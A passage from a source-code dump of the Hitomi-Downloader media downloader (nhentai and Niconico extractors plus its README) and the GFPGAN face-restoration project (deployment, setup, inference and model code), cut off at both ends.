= [] groups = [] seriess = [] for tag in gal['tags']: type = tag['type'] if type == 'artist': artists.append(tag['name']) elif type == 'group': groups.append(tag['name']) elif type == 'parody' and tag['name'] != 'original': seriess.append(tag['name']) elif type == 'language': lang = tag['name'] elif type == 'category': type_ = tag['name'] formats = [] for img in gal['images']['pages']: type = img['t'] format = {'j':'jpg', 'p':'png', 'g':'gif'}[type] formats.append(format) info = Info(host, id, id_media, title, p, artists, groups, seriess, lang, type_, formats) return info def get_imgs(id, session): info = get_info(id, session) imgs = [] for p in range(1, info.p+1): name = f'/galleries/{info.id_media}/{p}.{info.formats[p-1]}' url_page = f'https://nhentai.net/g/{id}/{p}/' url_img = urljoin(info.host, name) ext = get_ext(url_img) d = { 'page': p, } img = File_nhentai({'url': url_img, 'referer': url_page, 'name': utils.format('nhentai', d, ext)}) imgs.append(img) return info, imgs File: src/extractor/nico_downloader.py #coding:utf8 import downloader from io import BytesIO import ree as re from utils import Downloader, get_print, format_filename, try_n, LazyUrl, get_abr, Session, get_resolution, print_error, urljoin import utils import ffmpeg import os import ytdl import threading import errors import websockets # for nama from m3u8_tools import M3u8_stream def get_id(url): if '/watch/' in url: return re.find('/watch/([a-zA-Z0-9]+)', url) class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://account.nicovideo.jp/login') class Video: def __init__(self, session, info, format, cw, hb=None, d=None, live=False, ydl=None): self.session = session self.info = info self.title = info.get('fulltitle') or info['title'] self.ext = info['ext'] self.id = info['id'] self.format = format self.username = info['uploader'] self.url = LazyUrl(f'https://www.nicovideo.jp/watch/{self.id}', self.get, self, pp=self.pp) self.cw = cw self.hb = hb self.d = d self.live = live self.ydl = ydl self.filename = format_filename(self.title, self.id, self.ext, live=live, artist=self.username) self.url_thumb = info['thumbnail'] print('thumb:', self.url_thumb) self.thumb = BytesIO() downloader.download(self.url_thumb, buffer=self.thumb) def get(self, _): print_ = get_print(self.cw) hb = self.hb if hb: heartbeat_info_dict = hb['info'] heartbeat_url = heartbeat_info_dict['url'] heartbeat_data = heartbeat_info_dict['data'].encode() heartbeat_interval = heartbeat_info_dict.get('interval', 30) request = ytdl.get_ytdl().utils.sanitized_Request(heartbeat_url, heartbeat_data) def heartbeat(): if self.d.status == 'stop': print_('Heartbeat end') return try: hb['ydl'].urlopen(request).read() except Exception as e: e_msg = print_error(e) print_(f'Heartbeat failed:\n{e_msg}') self.timer = threading.Timer(heartbeat_interval, heartbeat) self.timer.start() heartbeat_info_dict['ping']() print_('Heartbeat with %d second interval ...' % heartbeat_interval) heartbeat() url = self.info['url'] if self.live: url = ytdl.Downloader(self.ydl, self.info, self.info['format_'], live=True, cw=self.cw) return url def pp(self, filename): if self.format == 'mp4': return name, ext_old = os.path.splitext(filename) filename_new = f'{name}.mp3' ffmpeg.convert(filename, filename_new, f'-shortest -preset ultrafast -b:a {get_abr()}k', cw=self.cw) if utils.ui_setting.albumArt.isChecked(): self.thumb.seek(0)# ffmpeg.add_cover(filename_new, self.thumb, {'artist':self.username, 'title':self.title}, cw=self.cw) return filename_new def __repr__(self): return f'Video({self.id})' def suitable(url): if 'nicovideo.jp' not in url.lower(): return False if 'nicovideo.jp/user/' in url.lower(): return True return get_id(url) is not None class Downloader_nico(Downloader): type = 'nico' single = True URLS = [suitable, 'ch.nicovideo.jp'] display_name = 'Niconico' _format = 'mp4' MAX_SPEED = 2.0 ACCEPT_COOKIES = [r'(.*\.)?nicovideo\.jp'] @classmethod def fix_url(cls, url): id_ = get_id(url) if not id_: return url.split('?')[0].split('#')[0] if re.find(r'^https?://', id_): return url if re.find(r'^https?://', url): domain = utils.domain(url) else: domain = 'www.nicovideo.jp' return f'https://{domain}/watch/{id_}' def init(self): self.session = Session('chrome') self.url0 = self.url if not get_id(self.url): self.url = get_live_from_user(self.url, self.session) def read(self): if self.cw.format: self._format = self.cw.format if self._format == 'mp3': self.cw.setMusic(True) video = get_video(self.session, self.url, self._format, self.cw, self) self.urls.append(video.url) self.setIcon(video.thumb) self.title = os.path.splitext(video.filename)[0].replace(':', ':') self.artist = video.username if video.live: d = {} d['url'] = self.url0 d['title'] = video.username d['thumb'] = video.thumb.getvalue() utils.update_live(d, self.cw) else: self.enableSegment() @try_n(2) def get_video(session, url, format, cw=None, d=None): print_ = get_print(cw) live = 'live.nico' in url if cw and live: cw.live = True# options = { 'noplaylist': True, #'extract_flat': True, 'playlistend': 1, } ydl = ytdl.YoutubeDL(options, cw=cw) try: info = ydl.extract_info(url) except Exception as e: e_ = e soup = downloader.read_soup(url, session=session) box = soup.find('div', class_='channel-invitation-box') if box: msg = box.find('p', class_='channel-invitation-box-body-channel-desc-msg1') if msg: msg = msg.text.strip() raise LoginRequired(msg or None) else: raise e_ fs = info['formats'] res = max(get_resolution(), min(f.get('height', 0) for f in fs)) print_(f'res: {res}') fs = [f for f in fs if f.get('height', 0) <= res] for f in fs: print_(f"{f.get('height')} {f['protocol']} {f['format']} - {f['url']}") ## if not live: ## fs = [f for f in fs if f['url'].startswith('niconico_dm')]# f = fs[-1] print_(f'f_url: {f["url"]}') if f['url'].startswith('niconico_dmc:'): ie = ytdl.get_extractor(url) ie._downloader = ydl info_dict, heartbeat_info_dict = ie._get_heartbeat_info(f) f = info_dict hb = {'info': heartbeat_info_dict, 'ydl': ydl} elif f['url'].startswith('niconico_dms:'): ie = ytdl.get_extractor(url) ie._downloader = ydl url_m3u8 = ie._get_dms_manifest_url(info) print_(f'url_m3u8: {url_m3u8}') f['url'] = url_m3u8 f['protocol'] = 'm3u8' _ = info.copy() _['formats'] = [f] m = ytdl.Downloader(ydl, _, _, cw=cw) f['url'] = m hb = None elif f['protocol'].startswith('m3u8'): m = M3u8_stream(f['url'], referer=url, session=session) ## session.headers.update(f.get('http_headers', {})) ## hdr = session.headers.copy() ## m = ffmpeg.Stream(f['url'], headers=hdr, cw=cw) f['url'] = m hb = None else: hb = None session.headers.update(f.get('http_headers', {})) info['url'] = f['url'] info['format_'] = f video = Video(session, info, format, cw, hb=hb, d=d, live=live, ydl=ydl) return video import selector @selector.options('nico') def options(urls): return [ {'text': 'MP4 (동영상)', 'format': 'mp4'}, {'text': 'MP3 (음원)', 'format': 'mp3'}, ] def get_live_from_user(url, session): if 'ch.nicovideo.jp' in url: cid = re.find(r'ch\.nicovideo\.jp/([^/?#]+)', url) url = f'https://ch.nicovideo.jp/{cid}/live' soup = downloader.read_soup(url, session=session) if live_now := soup.find(id='live_now'): return urljoin(url, live_now.find('a')['href']) raise Exception('no live') elif 'nicovideo.jp/user/' in url: cid = re.find(r'nicovideo\.jp/user/([^/?#]+)', url) d = downloader.read_json(f'https://live.nicovideo.jp/front/api/v1/user-broadcast-history?providerId={cid}&providerType=user&isIncludeNonPublic=false&offset=0&limit=100&withTotalCount=true', session=session) for pg in d['data']['programsList']: if pg['program']['schedule']['status'] == 'ON_AIR': id_ = pg['id']['value'] return f'https://live.nicovideo.jp/watch/{id_}' raise Exception('no live') else: raise NotImplementedError(url) class Live_nico(utils.Live): type = 'nico' @classmethod def is_live(cls, url): if 'nicovideo.jp/user/' in url.lower(): return True if 'ch.nicovideo.jp' in url.lower(): return True @classmethod def fix_url(cls, url): if 'nicovideo.jp/user/' in url.lower(): return '/'.join(url.split('/')[:5]).split('?')[0].split('#')[0] return '/'.join(url.split('/')[:4]).split('?')[0].split('#')[0] @classmethod def check_live(cls, url, info=None): try: session = Session('chrome') get_live_from_user(url, session) return True except Exception as e: print(e) return False
<p align="center"> <img src="imgs/card_crop.png" width="50%"/> <br> </p> [![GitHub release](https://img.shields.io/github/release/KurtBestor/Hitomi-Downloader.svg?logo=github)](https://github.com/KurtBestor/Hitomi-Downloader/releases/latest) [![GitHub downloads](https://img.shields.io/github/downloads/KurtBestor/Hitomi-Downloader/latest/total.svg?logo=github)](https://github.com/KurtBestor/Hitomi-Downloader/releases/latest) [![GitHub downloads](https://img.shields.io/github/downloads/KurtBestor/Hitomi-Downloader/total.svg?logo=github)](https://github.com/KurtBestor/Hitomi-Downloader/releases) ## Links - [Download](https://github.com/KurtBestor/Hitomi-Downloader/releases/latest) - [Issues](https://github.com/KurtBestor/Hitomi-Downloader/issues) - [Scripts & Plugins](https://github.com/KurtBestor/Hitomi-Downloader/wiki/Scripts-&-Plugins) - [Chrome Extension](https://github.com/KurtBestor/Hitomi-Downloader/wiki/Chrome-Extension) ## Demo <img src="imgs/how_to_download.gif"> ## Features - 🍰 Simple and clear user interface - 🚀 Download acceleration - 💻 Supports 24 threads in a single task - 🚥 Supports speed limit - 📜 Supports user scripts - 🧲 Supports BitTorrent & Magnet - 🎞️ Supports M3U8 & MPD format videos - 🌙 Dark mode - 🧳 Portable - 📋 Clipboard monitor - 🗃️ Easy to organize tasks ## Supported Sites | Site | URL | | :--: | -- | | **4chan** | <https://4chan.org> | | **AfreecaTV** | <https://afreecatv.com> | | **ArtStation** | <https://artstation.com> | | **AsmHentai** | <https://asmhentai.com> | | **Avgle** | <https://avgle.com> | | **baraag.net** | <https://baraag.net> | | **半次元** | <https://bcy.net> | | **BDSMlr** | <https://bdsmlr.com> | | **bilibili** | <https://bilibili.com> | | **ComicWalker** | <https://comic-walker.com> | | **Coub** | <https://coub.com> | | **Danbooru** | <https://danbooru.donmai.us> | | **Kakao Webtoon** | <http://webtoon.kakao.com> | | **DeviantArt** | <https://deviantart.com> | | **E(x)Hentai Galleries** | <https://e-hentai.org><br><https://exhentai.org> | | **Facebook** | <https://facebook.com> | | **FC2 Video** | <https://video.fc2.com> | | **Flickr** | <https://flickr.com> | | **Gelbooru** | <https://gelbooru.com> | | **Hameln** | <https://syosetu.org> | | **hanime.tv** | <https://hanime.tv> | | **Hentai Foundry** | <https://hentai-foundry.com> | | **Hitomi.la** | <https://hitomi.la> | | **Imgur** | <https://imgur.com> | | **Instagram** | <https://instagram.com> | | **Iwara** | <https://iwara.tv><br><https://ecchi.iwara.tv> | | **Jmana** | <https://jmana.net> | | **カクヨム** | <https://kakuyomu.jp> | | **Luscious** | <https://luscious.net> | | **Mastodon** | <https://mastodon.social> | | **Misskey** | <https://misskey.io> | | **MyReadingManga** | <https://myreadingmanga.info> | | **Naver Blog** | <https://blog.naver.com> | | **Naver Cafe** | <https://cafe.naver.com> | | **Naver Post** | <https://post.naver.com> | | **Naver Webtoon** | <https://comic.naver.com> | | **Naver TV** | <https://tv.naver.com> | | **nhentai** | <https://nhentai.net> | | **nhentai.com** | <https://nhentai.com> | | **Niconico** | <http://nicovideo.jp> | | **ニジエ** | <https://nijie.info> | | **Nozomi.la** | <https://nozomi.la> | | **Pawoo** | <https://pawoo.net> | | **Pinterest** | <https://pinterest.com> | | **Pixiv** | <https://pixiv.net> | | **pixivコミック** | <https://comic.pixiv.net> | | **Pornhub** | <https://pornhub.com><br><https://pornhubpremium.com> | | **Rule34.xxx** | <https://rule34.xxx> | | **Sankaku Complex** | <https://www.sankakucomplex.com><br><https://chan.sankakucomplex.com><br><https://idol.sankakucomplex.com> | | **Soundcloud** | <https://soundcloud.com> | | **小説家になろう** | <https://syosetu.com> | | **TikTok** | <https://tiktok.com><br><https://douyin.com>| | **TOKYO Motion** | <https://tokyomotion.net> | | **Tumblr** | <https://tumblr.com> | | **Twitch** | <https://twitch.tv> | | **Twitter** | <https://twitter.com> | | **Vimeo** | <https://vimeo.com> | | **Wayback Machine** | <https://archive.org> | | **Weibo** | <https://weibo.com> | | **WikiArt** | <https://www.wikiart.org> | | **xHamster** | <https://xhamster.com> | | **XNXX** | <https://xnxx.com> | | **XVideos** | <https://xvideos.com> | | **Yande.re** | <https://yande.re> | | **Youku** | <https://youku.com> | | **YouTube** | <https://youtube.com> | | **and more...** | [Supported sites by yt-dlp](https://github.com/yt-dlp/yt-dlp/blob/master/supportedsites.md) |
GFPGAN
7552a7791caad982045a7bbe5634bbf1cd5c8679
File: cog_predict.py # flake8: noqa # This file is used for deploying replicate models # running: cog predict -i img=@inputs/whole_imgs/10045.png -i version='v1.4' -i scale=2 # push: cog push r8.im/tencentarc/gfpgan # push (backup): cog push r8.im/xinntao/gfpgan import os os.system('python setup.py develop') os.system('pip install realesrgan') import cv2 import shutil import tempfile import torch from basicsr.archs.srvgg_arch import SRVGGNetCompact from gfpgan import GFPGANer try: from cog import BasePredictor, Input, Path from realesrgan.utils import RealESRGANer except Exception: print('please install cog and realesrgan package') class Predictor(BasePredictor): def setup(self): os.makedirs('output', exist_ok=True) # download weights if not os.path.exists('gfpgan/weights/realesr-general-x4v3.pth'): os.system( 'wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.5.0/realesr-general-x4v3.pth -P ./gfpgan/weights' ) if not os.path.exists('gfpgan/weights/GFPGANv1.2.pth'): os.system( 'wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.2.pth -P ./gfpgan/weights') if not os.path.exists('gfpgan/weights/GFPGANv1.3.pth'): os.system( 'wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth -P ./gfpgan/weights') if not os.path.exists('gfpgan/weights/GFPGANv1.4.pth'): os.system( 'wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.4.pth -P ./gfpgan/weights') if not os.path.exists('gfpgan/weights/RestoreFormer.pth'): os.system( 'wget https://github.com/TencentARC/GFPGAN/releases/download/v1.3.4/RestoreFormer.pth -P ./gfpgan/weights' ) # background enhancer with RealESRGAN model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=32, upscale=4, act_type='prelu') model_path = 'gfpgan/weights/realesr-general-x4v3.pth' half = True if torch.cuda.is_available() else False self.upsampler = RealESRGANer( scale=4, model_path=model_path, model=model, tile=0, tile_pad=10, pre_pad=0, half=half) # Use GFPGAN for face enhancement self.face_enhancer = GFPGANer( model_path='gfpgan/weights/GFPGANv1.4.pth', upscale=2, arch='clean', channel_multiplier=2, bg_upsampler=self.upsampler) self.current_version = 'v1.4' def predict( self, img: Path = Input(description='Input'), version: str = Input( description='GFPGAN version. v1.3: better quality. v1.4: more details and better identity.', choices=['v1.2', 'v1.3', 'v1.4', 'RestoreFormer'], default='v1.4'), scale: float = Input(description='Rescaling factor', default=2), ) -> Path: weight = 0.5 print(img, version, scale, weight) try: extension = os.path.splitext(os.path.basename(str(img)))[1] img = cv2.imread(str(img), cv2.IMREAD_UNCHANGED) if len(img.shape) == 3 and img.shape[2] == 4: img_mode = 'RGBA' elif len(img.shape) == 2: img_mode = None img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) else: img_mode = None h, w = img.shape[0:2] if h < 300: img = cv2.resize(img, (w * 2, h * 2), interpolation=cv2.INTER_LANCZOS4) if self.current_version != version: if version == 'v1.2': self.face_enhancer = GFPGANer( model_path='gfpgan/weights/GFPGANv1.2.pth', upscale=2, arch='clean', channel_multiplier=2, bg_upsampler=self.upsampler) self.current_version = 'v1.2' elif version == 'v1.3': self.face_enhancer = GFPGANer( model_path='gfpgan/weights/GFPGANv1.3.pth', upscale=2, arch='clean', channel_multiplier=2, bg_upsampler=self.upsampler) self.current_version = 'v1.3' elif version == 'v1.4': self.face_enhancer = GFPGANer( model_path='gfpgan/weights/GFPGANv1.4.pth', upscale=2, arch='clean', channel_multiplier=2, bg_upsampler=self.upsampler) self.current_version = 'v1.4' elif version == 'RestoreFormer': self.face_enhancer = GFPGANer( model_path='gfpgan/weights/RestoreFormer.pth', upscale=2, arch='RestoreFormer', channel_multiplier=2, bg_upsampler=self.upsampler) try: _, _, output = self.face_enhancer.enhance( img, has_aligned=False, only_center_face=False, paste_back=True, weight=weight) except RuntimeError as error: print('Error', error) try: if scale != 2: interpolation = cv2.INTER_AREA if scale < 2 else cv2.INTER_LANCZOS4 h, w = img.shape[0:2] output = cv2.resize(output, (int(w * scale / 2), int(h * scale / 2)), interpolation=interpolation) except Exception as error: print('wrong scale input.', error) if img_mode == 'RGBA': # RGBA images should be saved in png format extension = 'png' # save_path = f'output/out.{extension}' # cv2.imwrite(save_path, output) out_path = Path(tempfile.mkdtemp()) / f'out.{extension}' cv2.imwrite(str(out_path), output) except Exception as error: print('global exception: ', error) finally: clean_folder('output') return out_path def clean_folder(folder): for filename in os.listdir(folder): file_path = os.path.join(folder, filename) try: if os.path.isfile(file_path) or os.path.islink(file_path): os.unlink(file_path) elif os.path.isdir(file_path): shutil.rmtree(file_path) except Exception as e: print(f'Failed to delete {file_path}. Reason: {e}') File: setup.py #!/usr/bin/env python from setuptools import find_packages, setup import os import subprocess import time version_file = 'gfpgan/version.py' def readme(): with open('README.md', encoding='utf-8') as f: content = f.read() return content def get_git_hash(): def _minimal_ext_cmd(cmd): # construct minimal environment env = {} for k in ['SYSTEMROOT', 'PATH', 'HOME']: v = os.environ.get(k) if v is not None: env[k] = v # LANGUAGE is used on win32 env['LANGUAGE'] = 'C' env['LANG'] = 'C' env['LC_ALL'] = 'C' out = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env).communicate()[0] return out try: out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD']) sha = out.strip().decode('ascii') except OSError: sha = 'unknown' return sha def get_hash(): if os.path.exists('.git'): sha = get_git_hash()[:7] else: sha = 'unknown' return sha def write_version_py(): content = """# GENERATED VERSION FILE # TIME: {} __version__ = '{}' __gitsha__ = '{}' version_info = ({}) """ sha = get_hash() with open('VERSION', 'r') as f: SHORT_VERSION = f.read().strip() VERSION_INFO = ', '.join([x if x.isdigit() else f'"{x}"' for x in SHORT_VERSION.split('.')]) version_file_str = content.format(time.asctime(), SHORT_VERSION, sha, VERSION_INFO) with open(version_file, 'w') as f: f.write(version_file_str) def get_version(): with open(version_file, 'r') as f: exec(compile(f.read(), version_file, 'exec')) return locals()['__version__'] def get_requirements(filename='requirements.txt'): here = os.path.dirname(os.path.realpath(__file__)) with open(os.path.join(here, filename), 'r') as f: requires = [line.replace('\n', '') for line in f.readlines()] return requires if __name__ == '__main__': write_version_py() setup( name='gfpgan', version=get_version(), description='GFPGAN aims at developing Practical Algorithms for Real-world Face Restoration', long_description=readme(), long_description_content_type='text/markdown', author='Xintao Wang', author_email='[email protected]', keywords='computer vision, pytorch, image restoration, super-resolution, face restoration, gan, gfpgan', url='https://github.com/TencentARC/GFPGAN', include_package_data=True, packages=find_packages(exclude=('options', 'datasets', 'experiments', 'results', 'tb_logger', 'wandb')), classifiers=[ 'Development Status :: 4 - Beta', 'License :: OSI Approved :: Apache Software License', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', ], license='Apache License Version 2.0', setup_requires=['cython', 'numpy'], install_requires=get_requirements(), zip_safe=False) File: inference_gfpgan.py import argparse import cv2 import glob import numpy as np import os import torch from basicsr.utils import imwrite from gfpgan import GFPGANer def main(): """Inference demo for GFPGAN (for users). """ parser = argparse.ArgumentParser() parser.add_argument( '-i', '--input', type=str, default='inputs/whole_imgs', help='Input image or folder. Default: inputs/whole_imgs') parser.add_argument('-o', '--output', type=str, default='results', help='Output folder. Default: results') # we use version to select models, which is more user-friendly parser.add_argument( '-v', '--version', type=str, default='1.3', help='GFPGAN model version. Option: 1 | 1.2 | 1.3. Default: 1.3') parser.add_argument( '-s', '--upscale', type=int, default=2, help='The final upsampling scale of the image. Default: 2') parser.add_argument( '--bg_upsampler', type=str, default='realesrgan', help='background upsampler. Default: realesrgan') parser.add_argument( '--bg_tile', type=int, default=400, help='Tile size for background sampler, 0 for no tile during testing. Default: 400') parser.add_argument('--suffix', type=str, default=None, help='Suffix of the restored faces') parser.add_argument('--only_center_face', action='store_true', help='Only restore the center face') parser.add_argument('--aligned', action='store_true', help='Input are aligned faces') parser.add_argument( '--ext', type=str, default='auto', help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs. Default: auto') parser.add_argument('-w', '--weight', type=float, default=0.5, help='Adjustable weights.') args = parser.parse_args() args = parser.parse_args() # ------------------------ input & output ------------------------ if args.input.endswith('/'): args.input = args.input[:-1] if os.path.isfile(args.input): img_list = [args.input] else: img_list = sorted(glob.glob(os.path.join(args.input, '*'))) os.makedirs(args.output, exist_ok=True) # ------------------------ set up background upsampler ------------------------ if args.bg_upsampler == 'realesrgan': if not torch.cuda.is_available(): # CPU import warnings warnings.warn('The unoptimized RealESRGAN is slow on CPU. We do not use it. ' 'If you really want to use it, please modify the corresponding codes.') bg_upsampler = None else: from basicsr.archs.rrdbnet_arch import RRDBNet from realesrgan import RealESRGANer model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2) bg_upsampler = RealESRGANer( scale=2, model_path='https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.1/RealESRGAN_x2plus.pth', model=model, tile=args.bg_tile, tile_pad=10, pre_pad=0, half=True) # need to set False in CPU mode else: bg_upsampler = None # ------------------------ set up GFPGAN restorer ------------------------ if args.version == '1': arch = 'original' channel_multiplier = 1 model_name = 'GFPGANv1' url = 'https://github.com/TencentARC/GFPGAN/releases/download/v0.1.0/GFPGANv1.pth' elif args.version == '1.2': arch = 'clean' channel_multiplier = 2 model_name = 'GFPGANCleanv1-NoCE-C2' url = 'https://github.com/TencentARC/GFPGAN/releases/download/v0.2.0/GFPGANCleanv1-NoCE-C2.pth' elif args.version == '1.3': arch = 'clean' channel_multiplier = 2 model_name = 'GFPGANv1.3' url = 'https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.3.pth' elif args.version == '1.4': arch = 'clean' channel_multiplier = 2 model_name = 'GFPGANv1.4' url = 'https://github.com/TencentARC/GFPGAN/releases/download/v1.3.0/GFPGANv1.4.pth' elif args.version == 'RestoreFormer': arch = 'RestoreFormer' channel_multiplier = 2 model_name = 'RestoreFormer' url = 'https://github.com/TencentARC/GFPGAN/releases/download/v1.3.4/RestoreFormer.pth' else: raise ValueError(f'Wrong model version {args.version}.') # determine model paths model_path = os.path.join('experiments/pretrained_models', model_name + '.pth') if not os.path.isfile(model_path): model_path = os.path.join('gfpgan/weights', model_name + '.pth') if not os.path.isfile(model_path): # download pre-trained models from url model_path = url restorer = GFPGANer( model_path=model_path, upscale=args.upscale, arch=arch, channel_multiplier=channel_multiplier, bg_upsampler=bg_upsampler) # ------------------------ restore ------------------------ for img_path in img_list: # read image img_name = os.path.basename(img_path) print(f'Processing {img_name} ...') basename, ext = os.path.splitext(img_name) input_img = cv2.imread(img_path, cv2.IMREAD_COLOR) # restore faces and background if necessary cropped_faces, restored_faces, restored_img = restorer.enhance( input_img, has_aligned=args.aligned, only_center_face=args.only_center_face, paste_back=True, weight=args.weight) # save faces for idx, (cropped_face, restored_face) in enumerate(zip(cropped_faces, restored_faces)): # save cropped face save_crop_path = os.path.join(args.output, 'cropped_faces', f'{basename}_{idx:02d}.png') imwrite(cropped_face, save_crop_path) # save restored face if args.suffix is not None: save_face_name = f'{basename}_{idx:02d}_{args.suffix}.png' else: save_face_name = f'{basename}_{idx:02d}.png' save_restore_path = os.path.join(args.output, 'restored_faces', save_face_name) imwrite(restored_face, save_restore_path) # save comparison image cmp_img = np.concatenate((cropped_face, restored_face), axis=1) imwrite(cmp_img, os.path.join(args.output, 'cmp', f'{basename}_{idx:02d}.png')) # save restored img if restored_img is not None: if args.ext == 'auto': extension = ext[1:] else: extension = args.ext if args.suffix is not None: save_restore_path = os.path.join(args.output, 'restored_imgs', f'{basename}_{args.suffix}.{extension}') else: save_restore_path = os.path.join(args.output, 'restored_imgs', f'{basename}.{extension}') imwrite(restored_img, save_restore_path) print(f'Results are in the [{args.output}] folder.') if __name__ == '__main__': main() File: gfpgan/__init__.py # flake8: noqa from .archs import * from .data import * from .models import * from .utils import * # from .version import * File: gfpgan/utils.py import cv2 import os import torch from basicsr.utils import img2tensor, tensor2img from basicsr.utils.download_util import load_file_from_url from facexlib.utils.face_restoration_helper import FaceRestoreHelper from torchvision.transforms.functional import normalize from gfpgan.archs.gfpgan_bilinear_arch import GFPGANBilinear from gfpgan.archs.gfpganv1_arch import GFPGANv1 from gfpgan.archs.gfpganv1_clean_arch import GFPGANv1Clean ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) class GFPGANer(): """Helper for restoration with GFPGAN. It will detect and crop faces, and then resize the faces to 512x512. GFPGAN is used to restored the resized faces. The background is upsampled with the bg_upsampler. Finally, the faces will be pasted back to the upsample background image. Args: model_path (str): The path to the GFPGAN model. It can be urls (will first download it automatically). upscale (float): The upscale of the final output. Default: 2. arch (str): The GFPGAN architecture. Option: clean | original. Default: clean. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. bg_upsampler (nn.Module): The upsampler for the background. Default: None. """ def __init__(self, model_path, upscale=2, arch='clean', channel_multiplier=2, bg_upsampler=None, device=None): self.upscale = upscale self.bg_upsampler = bg_upsampler # initialize model self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device is None else device # initialize the GFP-GAN if arch == 'clean': self.gfpgan = GFPGANv1Clean( out_size=512, num_style_feat=512, channel_multiplier=channel_multiplier, decoder_load_path=None, fix_decoder=False, num_mlp=8, input_is_latent=True, different_w=True, narrow=1, sft_half=True) elif arch == 'bilinear': self.gfpgan = GFPGANBilinear( out_size=512, num_style_feat=512, channel_multiplier=channel_multiplier, decoder_load_path=None, fix_decoder=False, num_mlp=8, input_is_latent=True, different_w=True, narrow=1, sft_half=True) elif arch == 'original': self.gfpgan = GFPGANv1( out_size=512, num_style_feat=512, channel_multiplier=channel_multiplier, decoder_load_path=None, fix_decoder=True, num_mlp=8, input_is_latent=True, different_w=True, narrow=1, sft_half=True) elif arch == 'RestoreFormer': from gfpgan.archs.restoreformer_arch import RestoreFormer self.gfpgan = RestoreFormer() # initialize face helper self.face_helper = FaceRestoreHelper( upscale, face_size=512, crop_ratio=(1, 1), det_model='retinaface_resnet50', save_ext='png', use_parse=True, device=self.device, model_rootpath='gfpgan/weights') if model_path.startswith('https://'): model_path = load_file_from_url( url=model_path, model_dir=os.path.join(ROOT_DIR, 'gfpgan/weights'), progress=True, file_name=None) loadnet = torch.load(model_path) if 'params_ema' in loadnet: keyname = 'params_ema' else: keyname = 'params' self.gfpgan.load_state_dict(loadnet[keyname], strict=True) self.gfpgan.eval() self.gfpgan = self.gfpgan.to(self.device) @torch.no_grad() def enhance(self, img, has_aligned=False, only_center_face=False, paste_back=True, weight=0.5): self.face_helper.clean_all() if has_aligned: # the inputs are already aligned img = cv2.resize(img, (512, 512)) self.face_helper.cropped_faces = [img] else: self.face_helper.read_image(img) # get face landmarks for each face self.face_helper.get_face_landmarks_5(only_center_face=only_center_face, eye_dist_threshold=5) # eye_dist_threshold=5: skip faces whose eye distance is smaller than 5 pixels # TODO: even with eye_dist_threshold, it will still introduce wrong detections and restorations. # align and warp each face self.face_helper.align_warp_face() # face restoration for cropped_face in self.face_helper.cropped_faces: # prepare data cropped_face_t = img2tensor(cropped_face / 255., bgr2rgb=True, float32=True) normalize(cropped_face_t, (0.5, 0.5, 0.5), (0.5, 0.5, 0.5), inplace=True) cropped_face_t = cropped_face_t.unsqueeze(0).to(self.device) try: output = self.gfpgan(cropped_face_t, return_rgb=False, weight=weight)[0] # convert to image restored_face = tensor2img(output.squeeze(0), rgb2bgr=True, min_max=(-1, 1)) except RuntimeError as error: print(f'\tFailed inference for GFPGAN: {error}.') restored_face = cropped_face restored_face = restored_face.astype('uint8') self.face_helper.add_restored_face(restored_face) if not has_aligned and paste_back: # upsample the background if self.bg_upsampler is not None: # Now only support RealESRGAN for upsampling background bg_img = self.bg_upsampler.enhance(img, outscale=self.upscale)[0] else: bg_img = None self.face_helper.get_inverse_affine(None) # paste each restored face to the input image restored_img = self.face_helper.paste_faces_to_input_image(upsample_img=bg_img) return self.face_helper.cropped_faces, self.face_helper.restored_faces, restored_img else: return self.face_helper.cropped_faces, self.face_helper.restored_faces, None File: gfpgan/train.py # flake8: noqa import os.path as osp from basicsr.train import train_pipeline import gfpgan.archs import gfpgan.data import gfpgan.models if __name__ == '__main__': root_path = osp.abspath(osp.join(__file__, osp.pardir, osp.pardir)) train_pipeline(root_path) File: gfpgan/models/gfpgan_model.py import math import os.path as osp import torch from basicsr.archs import build_network from basicsr.losses import build_loss from basicsr.losses.gan_loss import r1_penalty from basicsr.metrics import calculate_metric from basicsr.models.base_model import BaseModel from basicsr.utils import get_root_logger, imwrite, tensor2img from basicsr.utils.registry import MODEL_REGISTRY from collections import OrderedDict from torch.nn import functional as F from torchvision.ops import roi_align from tqdm import tqdm @MODEL_REGISTRY.register() class GFPGANModel(BaseModel): """The GFPGAN model for Towards real-world blind face restoratin with generative facial prior""" def __init__(self, opt): super(GFPGANModel, self).__init__(opt) self.idx = 0 # it is used for saving data for check # define network self.net_g = build_network(opt['network_g']) self.net_g = self.model_to_device(self.net_g) self.print_network(self.net_g) # load pretrained model load_path = self.opt['path'].get('pretrain_network_g', None) if load_path is not None: param_key = self.opt['path'].get('param_key_g', 'params') self.load_network(self.net_g, load_path, self.opt['path'].get('strict_load_g', True), param_key) self.log_size = int(math.log(self.opt['network_g']['out_size'], 2)) if self.is_train: self.init_training_settings() def init_training_settings(self): train_opt = self.opt['train'] # ----------- define net_d ----------- # self.net_d = build_network(self.opt['network_d']) self.net_d = self.model_to_device(self.net_d) self.print_network(self.net_d) # load pretrained model load_path = self.opt['path'].get('pretrain_network_d', None) if load_path is not None: self.load_network(self.net_d, load_path, self.opt['path'].get('strict_load_d', True)) # ----------- define net_g with Exponential Moving Average (EMA) ----------- # # net_g_ema only used for testing on one GPU and saving. There is no need to wrap with DistributedDataParallel self.net_g_ema = build_network(self.opt['network_g']).to(self.device) # load pretrained model load_path = self.opt['path'].get('pretrain_network_g', None) if load_path is not 